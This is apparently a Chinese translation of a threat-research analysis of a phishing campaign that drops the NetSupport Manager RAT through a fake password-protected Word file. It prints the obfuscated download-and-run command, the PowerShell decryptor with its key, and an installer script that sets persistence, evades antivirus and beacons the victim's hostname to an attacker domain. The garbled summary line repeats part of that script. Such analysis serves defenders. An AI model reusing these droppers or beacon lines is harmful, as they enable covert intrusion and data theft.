NetSupport Manager RAT釣魚攻擊分析
摘要:HTTP/1.1 200 OK Server: NetSupport Gateway/1.6 (Windows NT) Content-Type: application/x-www-form-urlencoded Content-Length: 60 Connection: Keep-Alive CMD=ENCD ES=1 DATA=.g+$.{.. \。$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_}) ) $fpath ="$env:appdata\$randf" mkdir $fpath $clientname="presentationhost.exe" $Source = $file1 $Destination = "$fpath\"+"$clientname" react -source $source -destination $destination $Source = $file2 $Destination = "$fpath\client32.ini" write-host $destination react -source $source -destination $destination $Source = $file3 $Destination = "$fpath\HTCTL32.DLL" react -source $source -destination $destination $Source = $file4 $Destination = "$fpath\msvcr100.dll" react -source $source -destination $destination $Source = $file5 $Destination = "$fpath\nskbfltr.inf" react -source $source -destination $destination $Source = $file6 $Destination = "$fpath\NSM.ini" react -source $source -destination $destination $Source = $file7 $Destination = "$fpath\NSM.lic" react -source $source -destination $destination $Source = $file8 $Destination = "$fpath\pcicapi.dll" react -source $source -destination $destination $Source = $file9 $Destination = "$fpath\PCICHEK.DLL" react -source $source -destination $destination $Source = $file10 $Destination = "$fpath\PCICL32.DLL" react -source $source -destination $destination $Source = $file11 $Destination = "$fpath\remcmdstub.exe" react -source $source -destination $destination $Source = $file12 $Destination = "$fpath\TCCTL32.DLL" react -source $source -destination $destination reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ServiceDLL /t REG_SZ /d "$fpath\$clientname" /f start-process "$fpath\$clientname" #Start-sleep -s 10 Invoke-WebRequest -Uri "http://afsasdfa33[.]xyz/iplog/lepo.php。
2020年1月安全人員發現了一個僞造爲受密碼保護的惡意Microsoft Word文檔,該文檔在網絡釣魚活動中用於傳播商業化遠程訪問工具( NetSupport Manager ),此RAT通常用於管理員遠程訪問客戶端計算機。但是攻擊者將此RAT安裝到受害者的系統上,從而獲得訪問權限。攻擊活動中使用多種技術來規避動態和靜態分析,並利用PowerShell PowerSploit來執行惡意文件安裝。至少從2018年起NetSupport Manager RAT就已經出現在網絡釣魚活動中。
傳播方式
2020年1月上旬檢測到一個執行批處理文件的可疑winword.exe進程。 在圖1中可以看到多個檢測點,從啓動Microsoft Word開始,再到創建和執行.bat文件。 在圖2中可以看到“時間軸”,其中顯示了檢測警報,行爲流程和連接嘗試。 圖3顯示了基於這些行爲指標檢測到的初始警報。
下面圖4是惡意文檔截圖,僞裝成受密碼保護的NortonLifelock文檔,該文檔請求用戶輸入密碼以啓用宏。用於此分析的文
SHA256:e9440a5d2de2453ae5b69a9c096f8d4cf9e059469c5de67380d76e02dd6975
對用戶來說,文檔似乎包含需要密碼才能查看的個人信息。打開文檔並單擊“啓用內容”後,將執行宏並向用戶顯示密碼對話框。
密碼很有可能被攻擊者寫在釣魚郵件正文中,它只接受字母“c”或“C”,如下面的宏代碼所示。此宏代碼的哈希
SHA256:68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2
如果用戶輸入了不正確的密碼,則會顯示一條錯誤消息,然後顯示“完成”處理消息。在輸入正確的密鑰之前,不會進行惡意活動,輸入正確的密碼後,宏將繼續執行代碼並生成以下命令字符串:
cmD /c EChO|SE^t /p=" M^siexe">%temp%\alpaca.bat&EcHo|s^et /p="c " >>%temp%\alpaca.bat&EcHo|s^et /p="^/i" >>%temp%\alpaca.bat&EcHo|s^et /p=" http^:^/^/^quickwaysignstx[.]com/view.php ">>%temp%\alpaca.bat&EcHo|s^et /p=" ^/q &exit">>%temp%\alpaca.bat&%temp%\alpaca.bat&avvfge 2
宏使用visualbasicforapplications(VBA)窗體上的多個標籤對字符串進行模糊處理,字符最終連接在一起以構造最終命令,在受害者機器中下載並執行RAT。
命令字符串通過VBA shell函數執行,該函數執行以下操作:
1、通過/c參數啓動cmd.exe,執行命令並退出 2、在受害者%temp%目錄中構造名爲alpaca.bat的批處理文件 3、執行新創建的批處理腳本
批處理腳本使用msiexec,它是Windows安裝程序服務的一部分,用於下載二進制文件並安裝:
quickwaysignstx[.]com/view.php
如果請求中用戶代理字符串是Windows Installer,則返回MSI文件。MSI負載(SHA256:41d27d53c5d41003bc9913476a3afd3961b561b1201bee8bfde327a5f0d22a040a)是來自 www.exemsi [.]com的未註冊版本生成的,標題爲MPZMZQYVXO patch version 5.1。此版本字符串是隨機的,運行MSI時將顯示字符串。下載後,MSI將使用/q參數執行。MSI在受害者的%temp%目錄安裝PowerShell腳本REgistryMPZMZQYVXO.ps1。
function HYTNKJSDEH([String] $YTVRJKIEIR, [String] $BORBFDSYOP) { $DHPFYCOKLM = “<<strong>base64 encoded + encrypted payload</strong>>”; $encoding = New-Object System.Text.ASCIIEncoding; $KULVWNXDPId = $encoding.GetBytes("DJZGVUGVHDMNIGZD"); $derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($YTVRJKIEIR, $encoding.GetBytes($BORBFDSYOP), "SHA1", 2); [Byte[]] $ESFLDIMUEO = $derivedPass.GetBytes(16); $LCZJFEXHXR = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider; $LCZJFEXHXR.Mode = [System.Security.Cryptography.CipherMode]::CBC; $JOVGMJCIKY = $LCZJFEXHXR.CreateDecryptor($ESFLDIMUEO, $KULVWNXDPId); $LBUWDFHHMZ = New-Object System.IO.MemoryStream($DHPFYCOKLMa, $True); $ZSKXKODPKK = New-Object System.Security.Cryptography.CryptoStream($LBUWDFHHMZ, $JOVGMJCIKY, [System.Security.Cryptography.CryptoStreamMode]::Read); $STDVLFIUQN = $ZSKXKODPKK.Read($JHTZWEZBUW, 0, $JHTZWEZBUW.Length); $LBUWDFHHMZ.Close(); $ZSKXKODPKK.Close(); $LCZJFEXHXR.Clear(); if (($JHTZWEZBUW.Length -gt 3) -and ($JHTZWEZBUW[0] -eq 0xEF) -and ($JHTZWEZBUW[1] -eq 0xBB) -and ($JHTZWEZBUW[2] -eq 0xBF)) { $h = $JHTZWEZBUW[3..($JHTZWEZBUW.Length-1)]; } return $encoding.GetString($JHTZWEZBUW).TrimEnd([Char] 0); } $TYCNJNUWWG = HYTNKJSDEH "ew9p5rzlmvcf32b6i0oun8q47tag1xhs" "7ohp9z481qem6ykbdu2argt5lj3fcsi0"; Invoke-Expression $TYCNJNUWWG;
存儲在REgistryMPZMZQYVXO.ps1中的加密數據blob是另一個PowerShell腳本,負責將NetSupport Manager RAT安裝到受害者上。
PowerShell腳本是使用powerspoit框架中的開源腳本Out-EncryptedScript.ps1生成的。它包含base64數據處理模塊,並使用CBC的密碼模式進行TripleDES 。
此示例的解密密碼和初始化向量(IV)爲:
Decryption key = 0xA7A15B277A74CD3233B9DF078ABCDE12 IV = DJZGVUGVHDMNIGZD
$scriptPath = split-path -parent $MyInvocation.MyCommand.Definition if ($scriptpath -match "avast") {exit} if ($scriptpath -match "Avast") {exit} if ($scriptpath -match "AVG") {exit} if ($scriptpath -match "avg") {exit} function react ( $source, $destination ) { Convert-StringToBinary -InputString $source -FilePath $Destination; # } }#} function Convert-StringToBinary ( $InputString , $FilePath ) { $file= $InputString $data = [System.Convert]::FromBase64String($file) $ms = New-Object System.IO.MemoryStream $ms.Write($data, 0, $data.Length) $ms.Seek(0,0) | Out-Null $cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress) $sr = New-Object System.IO.StreamReader($cs) $t = $sr.readtoend()#|out-file str.txt $ByteArray = [System.Convert]::FromBase64String($t); [System.IO.File]::WriteAllBytes($FilePath, $ByteArray); } function Install { $file1 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file2 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file3 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file4 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file5 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file6 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file7 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file8 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file9 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file10 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file11 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $file12 = “<<strong>Gzip compressed + base64 encoded file</strong>>”; $randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_}) ) $fpath ="$env:appdata\$randf" mkdir $fpath $clientname="presentationhost.exe" $Source = $file1 $Destination = "$fpath\"+"$clientname" react -source $source -destination $destination $Source = $file2 $Destination = "$fpath\client32.ini" write-host $destination react -source $source -destination $destination $Source = $file3 $Destination = "$fpath\HTCTL32.DLL" react -source $source -destination $destination $Source = $file4 $Destination = "$fpath\msvcr100.dll" react -source $source -destination $destination $Source = $file5 $Destination = "$fpath\nskbfltr.inf" react -source $source -destination $destination $Source = $file6 $Destination = "$fpath\NSM.ini" react -source $source -destination $destination $Source = $file7 $Destination = "$fpath\NSM.lic" react -source $source -destination $destination $Source = $file8 $Destination = "$fpath\pcicapi.dll" react -source $source -destination $destination $Source = $file9 $Destination = "$fpath\PCICHEK.DLL" react -source $source -destination $destination $Source = $file10 $Destination = "$fpath\PCICL32.DLL" react -source $source -destination $destination $Source = $file11 $Destination = "$fpath\remcmdstub.exe" react -source $source -destination $destination $Source = $file12 $Destination = "$fpath\TCCTL32.DLL" react -source $source -destination $destination reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ServiceDLL /t REG_SZ /d "$fpath\$clientname" /f start-process "$fpath\$clientname" #Start-sleep -s 10 Invoke-WebRequest -Uri "http://afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername" $f=get-content $env:temp\insghha4.txt remove-item $env:TEMP\*.ps1 #cmd /c del %temp%\*.ps1 /f #cmd /c del %temp%\*.txt /f remove-item $f } #ShowConsole #rights install;
RAT安裝腳本會進行以下操作:
1、如果目標上正在運行Avast或AVG防病毒軟件,則停止安裝
2、將組成NetSupport Manager RAT的12個文件安裝到受害者%appdata%中的隨機目錄(長度爲8),例如c:users\username%AppdataRoaming\%randomvalue%
3、在受害者上創建以下注冊表項:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Name: ServiceDLL
Value: C:\Users\%username% \AppData\Roaming\%randomvalue%\presentationhost.exe’
4、執行主NetSupport Manager RAT presentationhost.exe
5、休眠10秒
6、將受害者的計算機名發送到 http://afsasdfa33 [.]xyz/iplog/lepo.php?hst=%computername%
7、從站點afsasdfa33.]xyz返回的任何數據都保存在%temp%目錄中的insghha4.txt
8、從受害者的%temp%目錄中刪除所有擴展名爲.ps1的文件
9、刪除名爲insghha4.txt的文件
NetSupport Manager(presentationhost.exe)啓動後將向域geo.netsupportsoftware[.]com查詢主機的地理位置,NetSupport Manager的原始名稱是client32.exe,更改爲presentationhost.exe以避免受害者懷疑。流量示例如下:
POST http://94.158.245 [.]182/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 94.158.245[.]182
Connection: Keep-Alive
CMD=POLL
INFO=1
ACK=1
響應:
HTTP/1.1 200 OK Server: NetSupport Gateway/1.6 (Windows NT) Content-Type: application/x-www-form-urlencoded Content-Length: 60 Connection: Keep-Alive CMD=ENCD ES=1 DATA=.g+$.{.. \….W…bb…).w}..o..X..xf…
受害目標發送的加密數據:
POST http://94.158.245 [.]182/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 244
Host: 94.158.245[.]182
Connection: Keep-Alive
CMD=ENCD
ES=1
DATA=u.2h.r..4.]..%y-…..=I…D3.W..i.7?….=@….F.f….&t.[..6ra..L..Tzg..... ..U.z4.]..%y-A9H=n .:!.”Pfd]U,[.(...f=I.....W.p..RHz.....#..@.....>|.?...R...s.nt.G..=}\[email protected][email protected]……..M.6..
總結
攻擊活動是從2019年11月初到2020年1月底。整個11月上半月,所有相關活動都使用的電子郵件附件,其中包含與目標公司有公開聯繫的個人或公衆人物。所有電子郵件使用隨機的protonmail[.]com電子郵件地址發送,包含與退款狀態或未經授權交易相關的郵件主題。從11月底到2020年1月郵件附件發生了變化,名爲<target company website>.doc,電子郵件主題相同,目前尚不清楚攻擊的目的意圖。
*參考來源: unit42 ,由Kriston編譯,轉載請註明來自FreeBuf.COM